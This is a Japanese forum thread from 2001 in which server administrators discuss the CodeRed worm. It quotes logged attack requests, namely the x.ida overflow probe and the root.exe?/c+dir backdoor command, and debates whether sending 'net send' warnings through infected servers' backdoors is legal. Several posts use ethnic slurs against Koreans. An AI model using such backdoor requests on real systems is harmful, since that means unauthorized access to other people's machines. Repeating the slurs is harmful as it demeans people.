1 :
CodeRed :
2001/08/14(火) 19:04
2 :
CodeRed :2001/08/14(火) 19:05
4 :
CodeRed=前スレ917 :2001/08/14(火) 19:05
タイトル長すぎでエラーでたので、ちょっと修正しました。
6 :
え〜ん :2001/08/14(火) 19:08
おー917さんおつかれ
おれもかちゅ〜しゃなんだけど、ブラウザ立ち上げたよ(w
8 :
名無しさん@お腹いっぱい。 :2001/08/14(火) 19:11
ここは良い板だ
┌─────┐ │ ウィソNT .. .│ ルーター │ IIS .┏┷┓EtherNet.┏━┓Internet │(´д`) ┃80┠────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜 │ ↓ . . ..┗┯┛ . ┗━┛ │ ISAPI . .│ │ ↓ . . │ │IndexServer│ └─────┘ ┌─────┐ │ ウィソNT .│ ルーター │ IIS . ┏┷┓ EtherNet ┏━┓Internet │(´д`) ┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜 │ ↓ ┗┯┛ .. ┗━┛ │ ISAPI . .│ │ ↓ ..│ │IndexServer│ └─────┘ ┌────────┐ │ ウィソNT │ ルーター │ IIS ┏┷┓ EtherNet ┏━┓Internet │(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜 │ ↓ ...┗┯┛ .. ┗━┛ │ ISAPI . │ │BufferOverFlow! .│ │ │ └────────┘ ┌────────┐ │ ウィソNT . │ ルーター │ IIS ┏┷┓ EtherNet ┏━┓Internet │(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ │ ↓ . ┗┯┛ .. ┗━┛ │ ISAPI. . │ │BufferOverFlow!. │ │ . │ └────────┘
さて、メシでもクーテこよ。
ごくろーさんです。
>>1 =前917 お疲れ〜。
しかし、マジ終わらんねぇ。
今日になって減少傾向も止まってしまった。
前スレの923さ〜ん。 結果報告してね(w
>>12 それだけどさ、なぜちょと増えたがわかるひといる?
15 :
え〜ん :2001/08/14(火) 19:58
管ですな というかうちは1日平均250〜300 飯食ってくる ひさびさage
16 :
名無し :2001/08/14(火) 20:08
全然状況 改善されておりません。211.*.*.* 9割糞チョン
まだまだすくねーよ、もっとがんばれよ赤虫。
18 :
名無しさん@お腹いっぱい。 :2001/08/14(火) 20:19
うちのアパッチにこんなログあった。新種? 172.*.*.42 - - [14/Aug/2001:14:28:46 +0900] "GET /x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=x%20HTTP/1.1 HTTP/1.0" 404 276 172.*.*.42 - - [14/Aug/2001:14:53:19 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
新種じゃないでしょ〜 GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 アタックされてます(w
20 :
名無しさん@お腹いっぱい。 :2001/08/14(火) 20:23
22 :
18 :2001/08/14(火) 20:25
UNIX + apache だからIP知られることもないんだけどなぁ
こんどはバックドア叩いて回るワームが出たのか?
24 :
18 :2001/08/14(火) 20:28
この AAAA ってやつと /scripts/root.exe?/c+dir はセットで残るんだよ
25 :
え〜ん :2001/08/14(火) 20:28
インターリンクがテストしてるんじゃないの。 あたりかまわずバックドア探し→コードレッドと変わらないって
26 :
18 :2001/08/14(火) 20:29
でも、x.ida?AA〜 だから、そんなファイルないでしょ? いたずらなのかなぁ
>UNIX + apache だからIP知られることもないんだけどなぁ 近所の適当なアドレスに出してる
28 :
名無しさん@お腹いっぱい。 :2001/08/14(火) 20:33
性質上、一匹見つけたら近所に一杯いる可能性が高いからね。
AAAA...は多分eEyeのチェッカー。
30 :
名無しさん@お腹いっぱい。 :2001/08/14(火) 20:44
31 :
名無しさん@お腹いっぱい。 :2001/08/14(火) 20:46
今日ISSのセミナーに行ってきたよ。 ここで知ったことのおさらいって感じだった。 ところどころいいかげんだったけど。 セミナー後に亜種の話とかすこし聞いたけど、 OSが日本語版かどうかのチェックをしている亜種があるって言ってた。 ま、どこまでホントかわかんないけど。
8/15に日本のだけ起動不可にするなんてのだったらけっこう すごい事になるね。
34 :
え〜ん :2001/08/14(火) 21:04
ちょいゲフインだけどインターリンクねたうぷしたよ。
下品以前に....
36 :
え〜ん :2001/08/14(火) 21:12
>>35 絵はへたヨ
コードレッドバスターってこういうことじゃないの?
バックドアから無理やり入る
>>18 もしこれが新種だとすると
近所のIP総に対してスキャン&ノックの2連発を発射。
ノックに返事したIPを返信って感じか?
40 :
38 :2001/08/14(火) 21:29
あぁ、日本語ヘンダネ 総スキャンといいたかったアルネ
41 :
39 :2001/08/14(火) 21:30
更に39だったアルネ
>>37 思いっきり。でも、気にしなくていいよ。
ただ、それで確認するのは勧められない。
みんな祭りに行ったか(w
44 :
え〜ん :2001/08/14(火) 22:32
祭りって珍走のことか?
GET /default.ida?XXXXXX...
を見に来たIPで、
http:// (そのIP)/ってブラウザ見に行くと、
IISでなくてPWSが立ってることあるんだけど、こういうものなのかな?
HEADを送ってWWWサーバーが何か確かめよう。
49 :
え〜ん :2001/08/15(水) 00:05
そろそろ寝る オヤスミ
50 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 00:05
さて、みなさんの所は未だ連日連夜相当数のアタックを受けているのでしょうか? 私のところは11日以降ぷっつりと途絶えました。
14日は139回
総数はかなり減ったけど、odn.ad.jpはむしろ増えてるところが恐ろしい
53 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 00:26
チョソンからラブコールが続く・・・
お盆明けにまた増えるよ。sage
>>46 不可能ではないよ。
ポート80がIISでポート8080がapacheとかね。
56 :
55 :2001/08/15(水) 00:39
ん?違うかも?
58 :
ちょっとマジめに :2001/08/15(水) 01:42
実際同じプロバの人間からcoderedアタック食らった時は ISPにmail出したほうがいいのかな? 俺が管理者ならそんなメールウザイだけなんだが
60 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 03:17
.jp からのアタックは減って来ている。
61 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 03:18
前スレ890じゃないが、/.Jがコードレッドバスターで盛り上がってる。(w 妙に粘着なコメントも。恨みでもあるのか?(もしかして某社のユーザ?) http//slashdot.jp/comments.pl?sid=01/08/14/0712213&op=&threshold=0&commentsort=0&mode=thread&startat=&pid=17#22
62 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 04:13
くらあM$!お前らが直接マスコミでも何でも使ってお前らの客に不良品の注意を呼び掛けろ! 他人のせいにすんな迷惑M$!
63 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 04:24
interlinkが泣いてます。 なにも総理大臣にチクらんでも・・・・ そんなに深刻なのか???
64 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 04:25
まぁM$だからね
66 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 04:54
だからM$を使っちゃいかんとあれほど…
67 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 05:08
M$は反省汁ー!
68 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 05:53
M$は全世界の管理者に残業手当を支給しろ。
69 :
M$社員 :2001/08/15(水) 07:00
セキュリティってなんですか?
70 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 07:13
マスコミはテレビ映えするWeb書き換えのみ報道。 マスコミは長期大規模IP被害のCodeRedよりもHTMLの文字列をより重要視。
マスコミが素でわかってないなnてことないかな?重要度
72 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 07:45
今だにWin2000はいいOSだとか言って今日も買う馬鹿がいるからな。 まあ馬鹿は他人から自分のPCに何されても構わないんだろ。 ただ周りにパケットをばらまくのだけは止めてもらいたい。
73 :
WIZ :2001/08/15(水) 07:53
2000の次は どうなんだろう?
>>73 メールハックされたとか騒いでる人ですか?
75 :
WIZ :2001/08/15(水) 07:57
あれはもう解決しました 犯人は速攻で捕まるでしょう まぁ いろいろあったけどさ よろしくね
76 :
WIZ :2001/08/15(水) 07:58
この名前書いてるだけで 荒らしが追ってくるから そのうち匿名になるかもしれないから そこんとこも よろしく
77 :
WIZ :2001/08/15(水) 07:59
とにかく 穏便に話をしたいだけさ
>>75 SPAMでトラフィックを増大させ、バックドア仕掛けられて晒された人だ。
人間CodeRedの称号を授けます。
79 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 08:34
>72 テメーは何使ってんだよ。 Beか?Macか?BSD?それともLinux? ケッ どれも同じようなもんだな。
81 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 08:43
82 :
WIZ :2001/08/15(水) 08:45
どうでもいいや おまえらは無視しよう ほかの人に迷惑になるしな
WIZたん出張もどきは?(藁
85 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 09:01
ぬけてると言うか ふぬけと言うか、何かすけーだぜー もしかしてwin2000使ってんじゃねーの(w 誰とは言わんがな(w
これ電話番号とか設定してあるのかな?今見れなくなったけど。 どいつもふぬけだな(w Directory of D:\LINUX\release 2001/02/15 18:30 <DIR> . 2001/02/15 18:30 <DIR> .. 2001/02/14 20:40 593 options.pppoe 2000/08/31 19:14 20,740 pppoed-2.0 2000/08/31 20:02 22,260 pppoed-2.2 2000/08/31 04:24 2,898 start-pppoe 2000/08/31 04:24 1,007 status-pppoe 2000/08/31 04:25 577 stop-pppoe 6 File(s) 48,075 bytes 2 Dir(s) 0 bytes free
87 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 09:11
>>73 さん
その、「2000の次は どうなんだろう? 」って何のことですか?
このスレは CodeRed のスレですよ。2000ってなんのことかわかりませんが、
CodeRed には2000云々ってのは全く関係ないと思います。
IIS の問題ではないでしょうか。NT5だけではなくNT4でも問題ですし。
その「2000」とやらと、「CodeRed」がどう関係するのか、ご教示
いただけないでしょうか?
>>87 WIZたんはチャットセクースとFFXで忙しいので煽ってはいけませんです。(藁
89 :
WIZ :2001/08/15(水) 09:27
わ〜ん おまえらみんな知り合いのハッカーに 晒してもらうんだから見テロよ〜
90 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 09:39
誰か泣きながら階段下りていったゾ(w
>>90 わざわざ2CHでメアド入れるというのもくさいよな
92 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 09:52
>>79 >テメーは何使ってんだよ。
管理者がそう簡単に自社の使用OS言う訳ないだろ。
なんかこいつ、ここでBeとか言うあたり部外者のOSヲタクだろうな。
最近仕事にもならんクソスレが増えたよ。
93 :
え〜ん :2001/08/15(水) 09:55
みんなおはよ
94 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 09:58
あ、えーんさんだ。
95 :
え〜ん :2001/08/15(水) 10:11
今日の1パツメうぷしたよ もうねたぎれ だれかいい画あったらおしえておくれ
96 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 10:28
会社の方針でWin2000をサーバにしていた所は死んでください。
97 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 10:33
某プロバイダから攻撃が来てて、警告のメールを出したら一時は おさまってたんだけど、今度はどうやらそこの DNS に感染した 模様……しっかりそこから攻撃が。こんな会社があるからこんな ことになるんだよなぁ……ぶつぶつ。
99 :
:2001/08/15(水) 10:49
レポート元 [Animefantasia] p2p.animeshare.com:8875 Wednesday, August 15, 2001 10:36:44 ユーザ名 : font12345 アクセスレベル : User オンライン時間 : 7:27:29 入室チャンネル : 状態 : Active 共有ファイル数 : 55 現在のダウンロード : 0 現在のアップロード: 1 接続種類 : DSL クライアントバージョン : WinMX v2.6j 最悪の持ち逃げヤロウ。
こちらで、ヲチのWIZスレに苦情を書き込まれた方はいらっしゃいますか?
>>73 他所の板にまで迷惑をかけるな。
まず、ネットウォッチ板に帰ってきて、
君の流した”電波スパム”について、全面的に謝罪しようか。
話はそれからだ。
102 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 11:09
おはよ〜。なんかちと荒れてるね。
>>46 亀レスすまん
Win98 で PWS つかってて、Win2K にアップグレートとかすると、
そういう状態 (サーバーは IIS, コンテンツは維持) になるみたいよ。
>>102 申し訳ありません。
うちのスレのふとどき者がWIZを騙って暴れているんです。
(本人確認済み)
そのものは近いうちになんとかしますので、無視をお願いします。
unzip ると 「Kaspersky Anti-Virus Internet Server Extension」 という機能をIISにアドオンする DLL が出て来ます。 ソースも公開してるみたい。 やばそな GET ブロックしたりログ取ったりするようですな。
exploitによるサーバ侵入でも、不正アクセス禁止法で挙げられるみたいだけど。 CodeRedを侵入させた場合も黒だよね。被害届出したらどうなる? また、MSが例によってバッファオーバーフローを「仕様だ」とした場合。 exploitによる外部からの機能変更も「仕様にある機能を利用した」だけ って事にはならないのかな。
110 :
名無し :2001/08/15(水) 14:17
アタック元のIPのWWW見に行ったらCodeRedじゃなくて SunOS/BoxPoison.wormだった。 ウイルスチェッカ更新しといてよかったよ。 まあ自分はWinだからどっちみち問題ないだろうが・・・ ちなみにHPにはこんなメッセージが表示されていた。 fuck CHINA Government fuck PoizonBOx
111 :
なー :2001/08/15(水) 14:18
ぐがっ停電で3台とも落ちたよ・・・ とりあえずカミナリが赤虫よりコワ。オフトピすまぬ。
113 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 14:31
>>109 > また、MSが例によってバッファオーバーフローを「仕様だ」とした場合。
「例によって」って、過去にそんな例あったっけ?
煽りじゃなくてマジ質問。
114 :
なー :2001/08/15(水) 14:33
不正アクセス禁止法の3条の3にこうある。 > 三 電気通信回線を介して接続された他の特定電子計算機が有するアクセス制御機能によりその特定利用を制限されている特定電子計算機に電気通信回線を >通じてその制限を免れることができる情報又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為 単純に解釈すると「/script/root.exe?/c〜」はこの「制限を免れることができる情報」って事。 少なくともアクセスに際してIDやPASSWDが有ろうが無かろうが鯖管理者の承諾が無いコードで制御を得ると 「不正アクセス」と解されるかもよ?
115 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 14:35
不正アクセスになるだろうけど、被害届を出しても >管理者は、‥‥‥‥不正アクセス行為から防御するため必要な措置を講ずるよう >努めるものとする。 管理が悪いと言われて終わりかも。(藁)
>>109 CodeRedを送出して侵入させた鯖の管理者に責任を問えるかなあ?
ウイルスの被害者が加害者にもなる場合やら踏み台にされた鯖の管理者の責任って
明示されてないんじゃない?
117 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 14:39
漏れの頭もバッファオーバーフロー え〜ん氏またなにやらUPしてるし・・・
>>110 やだねー。踏ミ台にされてるマシンがとっても沢山ありそうだ
個人的にはこれに乗じて仕込まれる(であろう)その種のモノの
2次被害がむしろ心配。
ヤられたIIS鯖のみなさーん、潔くHDD洗ってね。(藁
違った。3条2項3号だった。
漏れ勘違いしたな?
>>116 まさにそこが問題。
ではあるのだが、意図的にバックドアから侵入した場合の
ほうが悪意があると判断されて不利になりそう。
今回だれか裁判して判例を作ってくれ(w
>>113 いや、バグを仕様とする事を「例によって」と書いてしまった。
ちょっと書き方悪かったスマソ。
>>114 root.exeに触れたら即アウトかと。
CodeRedが自動的に行う「その制限されている特定利用をし得る状態にさせる行為 」って
やつの責任はCodeRed感染サーバーに掛かるのかしらん。
>>115 -116
管理者の責任は明示されてるような気が(第五条)、でも罰則は無いね。
>>115 そやね。
しかし、管理義務を怠っている鯖に侵入しても良い訳ではない。
少なくともバックドアで侵入すると「圧倒的に不利」である事は自明。
>>122 感染させた鯖も管理を怠っていた。
そこから送出されたCodeRedに感染した鯖も管理を怠っていた。
「管理を怠った管理者」が「管理を怠った管理者」に文句言う資格はある?
バッファオーバーフロー起こさせようとしたけども相手がApacheだったから クラックできなかったとかいう場合は罪に問えないのか。
127 :
なんにせよ :2001/08/15(水) 15:18
検挙、逮捕、という恥ずかしい結果になろうとも、
実際弁護士、検察、裁判官、わかってんの? 判例というが、
法曹の場でこれほどややこしくなるとサイバー界専用のが居るなぁ。
各方面からの証拠書類あれこれと、膨大な実際裏方作業で報われる結果に
なるのだろうか?
>>126 玄関の鍵穴に違うの差し込んで、ガチャガチャやった感じかな。
実生活で言うと不法侵入未遂ってことか。補導の対象だな。。W
アタックされて煩いわ、復讐しようとすれば犯罪者だわ、面白くないね。 馬鹿なNTユーザーが処罰されない法律そのものに問題があると思われ。 現実にスループット低下という状況がある以上、我々は被害者だ。
執拗なアタックにより現実にこちらが被害を受け、 しかも連絡の手段も無い相手には、 最低必要限な調査としてのroot.exeへのアクセスは、 正当な防衛と主張できると思われ。 例えば、相手が単に無意識の感染によるものなのか、 それに偽装した意図的な攻撃で、今後被害が拡大し そうなのかどうかなどは、座して待っているだけで はわからない。
>>129 それは感情論だけで、法的な根拠は何もないぞ。
訪問販売のおばちゃんとか新聞の勧誘員がうざいからって、 殴ったら障害罪だろうねえ。
新しい動きが無いから、同じ話題が繰り返されて、うざったいけど。
code redスレッドらしいといえばらしいかな。
>>129 氏とかの有志が警察に宣言した上でバックドアからのIIS停止工作
をやったら見物人としては楽しいからやってみて欲しい。
やるなら正々堂々とね。
133 :
なんにせよ :2001/08/15(水) 17:50
不毛な論議だな、誰だCodeREDの肩もつやつは?感染者と思われてもしかたないぞ。法的根拠なぞ両方にない。 前例でしか考えられないのもアポーン。 怒られた時点で、義務教育で教えて貰ってないもん。これで決定。 イカンならイカんとせっせと広報しない司法が悪い。 おれは、リンク踏んだだけと言えば場合により結構かも。 (飛び先辿られなければね) どうでも言えるし、裁判官にすれば"ややこしうて爺にはわかりませんわ"ってのが本音だろうな。
134 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 17:57
135 :
なんにせよ :2001/08/15(水) 18:39
>>134 サンクス!
をを!EVERYDAY PEOPLE! この書き入れ時になにやっとったん!
夏休みもご苦労様。正常だったら対応出来なかったと見るが W
さぁ〜みなさん始まりです〜〜〜えぶりで〜〜ぴぃぽ〜。、、、
短期的な論点として、 「メールでの警告が不能な時、root.exeを用いた警告は是か非か?」でどお?
なるほど・・・ 例えるなら、震災時の倒壊しそうな危険な建物を故意に潰して安全を確保するようなものか
139 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 19:27
非。 どうも感情的に「オレはウイルスを送りつけられた被害者だ!」と 主張する向きが多い気がする。 帯域を圧迫されるほど大量に送られてるヤツって多いの?
140 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 19:29
>>138 現状は震災ほど深刻か?
震度3程度で踏み込まれては堪らんよ。
root.exeと言わないでバックドアと言った方が... 言葉の違いだけなんだけど印象違うね。 root.exeを触っただけでアウトの可能性は高い。 ディレクトリ掘るのは器物破損になるのかな(笑) net sendするのは...
「バックドアを使う」の定義をCodeRedに当てはめるのと どこからどこまでの行為かが曖昧になる。 「root.exe(cmd.exe含)を使う」の方が明確だよ。
>>141 電子計算機損壊等業務妨害って罪になるのかな
root.exeを使うの方が罪悪感なくていいよ。
確かに「ただのurlじゃん。port80を開放してる方が悪い」とする意見は聞こえてきそうだ。
刑法 第三十七条 (緊急避難) 自己又は他人の生命、身体、自由又は財産に対する現在の 危難を避けるため、やむを得ずにした行為は、これによっ て生じた害が避けようとした害の程度を超えなかった場合 に限り、罰しない。ただし、その程度を超えた行為は、情 状により、その刑を減軽し、又は免除することができる。 前項の規定は、業務上特別の義務ある者には、適用しない。
海外のサーバーに対してやる場合は何処の管轄なの?インターポール?
刑法 第百七十七条 (強姦) 暴行又は脅迫を用いて十三歳以上の女子を姦淫した者は、強姦の罪とし、 二年以上の有期懲役に処する。十三歳未満の女子を姦淫した者も、同様とする。
>>149 「生命」しか読めないのか?その後ろになんて書いてある?
自由や財産も適用対象だ。
>>150 あるいは、検索ロボットが、とか。
過去ログにもそんな話があったな。
>>151 法律は、事象(行為によって生じた被害や事件)が発生した場所の法が適用される。
銃で国境の向こうに居る人間を射殺すれば、射殺された人の居る国の法律で裁かれる。
鯖の被害でも同じ。鯖のある国の法律に従う。
2chは外国にあるが2chの書き込みで誰かが被害を受けたらその人の居る国の法律で裁かれる。
容疑者の逮捕手段は容疑者の居る国の法律に従う。
容疑者の引渡しは各二国間の取り決めがある(らしい)。
容疑者が日本国内に居るなら令状無しには逮捕できないね。 現行犯じゃなければ。
加害者はkrにいて、鯖がusにあって、鯖の持ち主は日本人だけど、 twに10年くらい出張中で損害を被ったら?
>>159 鯖の破壊そのものの罪はusの法で、それによって生じた損害はtwでない?
>>156 犯人引渡し条約はアメリカとの間でしか結んでいなかったような・・・
間違ってたらごめん。
んで、確か懲役1年以下の罪に関しては条件を満たさないということで
引渡しはできなかったと思う。不正アクセス禁止法は1年以下の懲役じゃ
なかったっけ?
アメリカのネットゲームでIDぱくった日本人が、インターポールからの
通報を受けて日本で日本の警察に逮捕されたけど、そういう絡みもあって
「日本で捕まえてくれ」ってなったのかな?
しかし韓国にも「サーバをクラックする罪」がある(らしい)から、 告発すれば韓国国内でも刑事事件になるのでは?
163 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 20:44
つまりroot.exeでdel+"*.*"だと有罪でdir+"c:\"は無罪? はっきりしてくれ。困るじゃないか。
ただいま〜
風呂上りのビール(゚д゚)ウマー
例えばさ、アタック来たIPにいきなりバックドア経由のnet send * "感染してる ぞゴルァ!" (実際これはうまく動くぞ)ってのは、相手に何ら損害を与えてない よね。いきなりPopup出るから精神的にショック与えるかもしれんが。こちらも 相手のサーバーの内容を一切見てもいなければファイルコピーや勝手にディレク トリー作った訳でもない。ここまではイケるんでないかとは思うんだが。Perl あたりで簡単に作れそう。
個人的には支持したいけど、結果、どうなるかは 結局、やってみないとわからない。 お巡りさんに相談してみよう。
HTTP 403.9 - アクセスは許可されていません: 多数のユーザーが接続中です。 インターネット インフォメーション サービス
やれ。ただし条件。 あんたが「やむを得ず」やろうとしている事の影響 < あんたがそいつから受けた損害 「やむを得ず」に注意してね。
codered.com $19500 で売りに出てます。
容疑者を起訴して有罪にできるかどうかは別にして、そいつをパクる かどうかは警察の判断。法廷闘争で戦えそうな根拠があるとしても、 だからパクられないとは言えないよな。とりあえず捕まえやすい奴を パクっておいたほうが、見せしめの効果があるとか判断して もおかしくない。新左翼の連中なんか駐車違反で家宅捜索されてるしな。
まあ、 あと立証責任がどっちにあると判断されるかだ。 とりあえず、(やむを得ず)を立証する責任は負 わされるだろうな。 他の手段があるような場合はだめよ。
175 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 22:23
見せしめはやるだろうね、それもマスコミが取り上げやすいようなのを。
「ちょっとまってよー。 法律的には問題あるかもしれないけど、悪いことしようってんじゃないでしょ。」 と書いてこれが無責任な発言であることに気が付いた。 インターネットって難しいね…
悪意が無ければ許されるのではガキの理屈と同じ。
179 :
名無しさん@お腹いっぱい。 :2001/08/15(水) 22:52
ま、不正アクセス禁止法は親告罪だから、管理者次第なんだろうが
法曹ねたでなんかできないかな〜 う〜ん 今日はうぷおしまい
え〜ん氏そういえば放送局との話進んでるんですか?
>>180 あの背景はなんですか?ゲイツくんはわかりますが
まだやってんの? 早く寝たら?
今日の攻撃、2/3以上日本のホスト。お盆休みから帰っていきなり感染してる 恥ずい奴ら多数と思われ。国辱である。zaqとalpha多数。
プライベートIPなのに今日のログ見たら新たな感染者のIPやDNS名が出て来る出て来るハァ
CATV局から感染者はモデム止めちゃいますんで了承(1秒)して下さいねってメールきたyo 個人的にCATV局(皆から非難囂々なの)を応援してるんで、がんばって欲しいです
>>187 うちのCATVは、プロバイダの運営するサー
バが感染している。しかもお盆休みで放置。
通告しても応答なし。
危機意識をもって対応しているだけマシだよ。
>>188 それ酷いなぁ。
IP晒さなくて良いから、どこのCATVですか。
>>190 し〜ぷるが感染してるんだ。
うちもし〜ぷるの範囲内だけど、集合住宅だから加入できなかったという苦い経験あり。
個人的にはCATV側の対策が遅れているのはまだ許せるレベルです
それよりも許せないのがCATVに裏口を作って運用していた
http://www.keepoint.com/defaultj.asp のような会社(それも絶対に感染してはならないような事業内容)
域内には2台以上のサーバー立ててやがった
今はモデムが止められたようなので域内の総アタック数は減ったけど根絶は出来ていない
15日のXXXは148匹で最低記録更新 明日からどうなるかが気になるところ。
194 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 01:06
盆の間放置されてるのんきなプロバを晒すスレでもすくリマ消化
195 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 01:24
本当にいつなくなるんだろう
しかし、帯域共有のCATVでやられると痛いねぇ。
一件あたりに一通出したりするとspam発生ソフトになっちゃうね。
199 :
18 :2001/08/16(木) 03:41
やっぱりAAAAAAはチェッカーだった。 チェッカーならバックドア叩いていいのか?
自分の管理するマシンならかまわないんじゃないかな。 自分の以外にやるのは悪用だよなあ。
200!
202 :
え〜ん :2001/08/16(木) 08:22
おはようあげ
Googleなんでカンコックになってるの? いつもと違うと思ってジーっと見たけど
七五三がちょっと楽しみになったね。
>>204 教えてくれてサンクス
思わずキャプチャーしちゃったんだけど
すてよ
208 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 10:12
MS Hotmail (NETBLK-HOTMAIL)やMSN (NETBLK-MSN-BLK)から 攻撃されてるみたいなんですけど、コピーしたOSつかってるからかな?
>>208 攻撃って、CodeRedII?
だよなぁ、その板なんだし。まだ直してないのかM$・・(泣藁
210 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 11:26
自転車に乗れるようになりました!!
CR-IIの乱数にはクセがあるみたい。 203.162.12.??? つーベトナムのホストから一時間に一回ぐらい来る。 昨夜ドメインのWebmasterにメール送ったけどまだ続いてる。 政府高官のPCで誰も手出しできないとか…(鬱 下っ端なら騒乱罪で死刑かも…(藁
コードレッド 個人も感染 「このウイルスはマイクロソフト製のホームページ発信用ソフトを組み込んだ パソコンに感染。・・・転送速度を落とす・・・」 てあったけど、HP発信用ソフトって何? HP作ってない人は持ってないってことですか?
>>213 サンクス
げ! IEに感染してるじゃん。こわ
215 :
213 :2001/08/16(木) 13:33
まさかIISデフォでプリインストールされてるメーカーでもあるんかねー。
HP発信用ソフト=ブラウザ のことだったのねん! 閲覧用ならわかったのにな・・
217 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 13:38
ん?IISのことじゃないの?
218 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 13:38
それはないだろーと言いたいけどね
今後の展開次第ではっきりすると思うがハンドル登録が今日なんでネタなのかもしれん。スマソ。
>>213 これCodeRedか?
MXでもやってんじゃネーノ?
今考えてみたらその他のウィルスも考えられるね。重ね重ねスマソ。
中身無しが多くなったと思ったら プロバイダがフィルターをつけたってよ IP記録してるって
224 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 14:56
どこのプロバイダ?
なんだなんだ。 夏だから? ネタ? もしくは、やぷーからのお客さま?
このコードレッドパスタってinterlinkの加入者のIPに対して 有効ってこと?
229 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 15:45
>>227 何か、ウイルスとワームの区別がついていないような事が
書いてあるねえ。ワームだとネームバリューがないので
あえてウイルスと書いたんだろうか。
233 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 16:34
Name: ppp010.mal.jp.rim.or.jp Address: 202.247.157.137
>>232 ワラタ
ウイルス対策会社「シマンテック」(東京都渋谷区)の星沢裕二マネジャーは
「個人もお金をかけて企業に近い安全対策を取らないと、社会の損害はますます
広がる」と警告している。
ノートン大売れ、株あがるか?
>>234 CR-IIはシマンテックのやらせだったりして・・・
236 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 17:08
シマンテックの販売促進部のなかにプロジェクトCRなんてのが あったりして・・・
237 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 17:13
ソイレント・グリーンって知ってる?
その昔パソコンゲームのフロッピープロテクト屋さんがありました。
ゲームメーカに対しては、プロテクトを掛けるお仕事。
秋葉原では、ファイラーとしてそのプロテクトをはずす商品を売っていました。
今ではシマンテックさんが同じ事をしていると思います。
>>237 ううう ストーリが思い出せない。
人肉食べるやつだよね。 スマン。それしか覚えていない。
241 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 19:18
文科省コンピューターにウイルス侵入痕、サーバー休止
http://www.yomiuri.co.jp/04/20010816i311.htm インターネットを通じて行政文書のリストなどを検索できる文部科学省の情報公開用サーバーで16日、コンピューターウイルスの侵入を受けた痕跡が見つかった。
外部からデータを不正に改変するための“道具”が埋め込まれており、同省は「このサーバーを足掛かりにして、省内の別のコンピューターなどに侵入される恐れがある」として、
同サーバーを休止し、被害状況を調べている。
公開されているリストは本来、インターネットから接続した利用者は閲覧するだけで、内容を変えることはできない。
ところが、改変を可能にする“道具”が、サーバーのシステムにいつの間にか組み込まれていた。
同省は、世界で猛威を振るっているコンピューターウイルスの「コード・レッド」が侵入して残した痕跡ではないかとみている。
同サーバーは今年4月、情報公開法の施行に伴って稼働したが、蓄えられたデータ自体には今のところ、
改変などの被害が見当たらず、同省は「かなり以前に侵入されたのに、今まで気付かず、何者かが省内の他のコンピューターへ不正接続する足掛かりとして悪用した可能性もある」として、過去の接続記録などを調べている。
(8月16日17:42)
「ばっくどあ」全開でサービスしてる人への警告メッセージ考えてみました。 net send * "あンた、背中が煤(すす)けてるぜ (c)能條純一"
関西電力のeonet.ne.jpって所からアタック来たのでIPアドレスと アタック日時を連絡したら、 > 誠に恐れ入りますが、頂いたご質問の趣旨を > 十分に汲み取る事ができませんでした。 > 誠に申し訳ございません。 > 特にどのような状況でどういった攻撃を受けられたのか > などをお知らせくださいますようお願い申し上げます。 今時CodeRedIIによるアタックが理解できんとは、なかなか"ほのぼの" とした業者のようだ。関西に住んでれば入会してみたかったところだ。
248 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 20:56
